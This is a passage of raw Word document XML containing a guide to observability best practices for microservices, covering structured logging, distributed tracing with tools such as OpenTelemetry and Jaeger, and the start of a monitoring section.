        <w:t xml:space="preserve"> is a key aspect of maintaining and improving the performance and reliability of applications, especially in microservices architectures. It provides the ability to understand the internal state of a system based on the external outputs. The three main pillars of observability are </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tracing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785B9621"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Here are the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>best practices</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each of these pillars:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B6B78" w14:textId="77777777" w:rsidR="00D056EB"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6B5B74">
          <v:rect id="_x0000_i2834" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2176C19F"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1. Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EEC14F"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Logging provides the foundation for debugging, monitoring, and identifying anomalies in an application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597AD7A7"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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B00758"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Structured Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7416A776"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Use JSON format</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for logs instead of plain text to make parsing easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24235AAC"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Log entries should be structured so that key-value pairs (like timestamps, request IDs, error codes, etc.) can be easily extracted and indexed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5A353F"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB9BE01"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BAF99D"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timestamp": "2025-04-19T14:32:00Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E06E04B"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level": "INFO",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D75212"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message": "Request received",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3774588D"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requestId": "12345",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0575F52A"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userId": "67890",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194AFADE"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endpoint": "/api/data"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E84098"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E02BD18"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Log at Appropriate Levels</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1D0C33"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INFO</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For normal operations (e.g., service start, user requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0769C923"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DEBUG</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For detailed information useful for debugging (e.g., function call entry and exit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0055F792"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ERROR</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For logging error events or exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC1E0CE"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WARN</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For potential issues that aren’t critical but should be looked into.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD9F6F6"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Log Correlation IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E3F0B8"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Add </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>correlation IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., X-Request-ID) to logs for tracking a request through all the microservices it touches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619682E8"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This is crucial in distributed systems to link logs across different services for a particular request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6628E3BB"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Avoid Sensitive Information</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52383D44"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Never log sensitive information like passwords, API keys, or user data in logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52933BA2"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Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>masking</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> technique for sensitive fields (e.g., "*****" for credit card numbers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75639F33"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Log Rotation and Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DF5035"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Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log rotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid consuming excessive disk space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5714AB4A"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lastRenderedPageBreak/>
        <w:t>Define a retention policy to archive or delete old logs based on your needs (e.g., keeping logs for 30 days).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3661647A"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Centralized Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515861B4"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Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>centralized logging solution</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ELK Stack (Elasticsearch, Logstash, Kibana)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Fluentd</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Logstash</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for aggregating logs from all services in one place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A917DF"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Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Splunk</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Datadog</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also help in collecting, searching, and analyzing logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005ABEA" w14:textId="77777777" w:rsidR="00D056EB"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A06F8C">
          <v:rect id="_x0000_i2835" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A10B0B"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2. Tracing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4131996F"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Distributed tracing enables you to trace the journey of a request as it travels across multiple services in a microservices architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D81B81"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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA3F815"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Use Distributed Tracing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C711DC2"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Implement distributed tracing with tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OpenTelemetry</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Zipkin</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jaeger</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F9D67"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Each service should generate trace IDs and propagate them with requests to downstream services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02965110"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Trace Every Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB081B7"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Ensure that each request gets traced from the entry point (API Gateway) to the backend services. This includes any external calls (e.g., database queries or third-party APIs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6D3E73"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Tag Traces with Contextual Information</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03017AA7"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Include </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metadata</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like the HTTP method, request path, user ID, and any business-related context in the trace, so that you can easily filter and analyze traces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB06F9"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Example: Add custom tags to the traces like "orderId", "transactionId", etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D7620B"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Instrument Your Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D8F379"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Use tracing libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud Sleuth</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Spring Boot or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OpenTelemetry SDK</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to add tracing capabilities in the application code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C013AA0"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Ensure you instrument all relevant APIs, external calls, and business logic with trace spans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06330BE2"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Ensure Distributed Trace Propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5B8509"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Ensure that trace context (like trace ID) is propagated across service boundaries using HTTP headers (e.g., X-B3-TraceId, X-Request-ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250BA35B"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Sampling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A86A1EA"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sampling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to limit the number of traces recorded to avoid performance overhead. Only sample a fraction of requests and adjust based on traffic volume or use-cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FE6F44"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Trace Error Scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FF54B4"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Ensure errors are logged and traced correctly, including stack traces and context. This is critical for debugging complex issues in distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E613E6D" w14:textId="77777777" w:rsidR="00D056EB"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DE411BF">
          <v:rect id="_x0000_i2836" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A4CEE9"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3. Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A2AF77"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Monitoring focuses on collecting metrics (e.g., response times, error rates) that help you assess the health and performance of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40323495"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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6118157D"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Expose Application Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FD42AF"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Use a monitoring tool like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
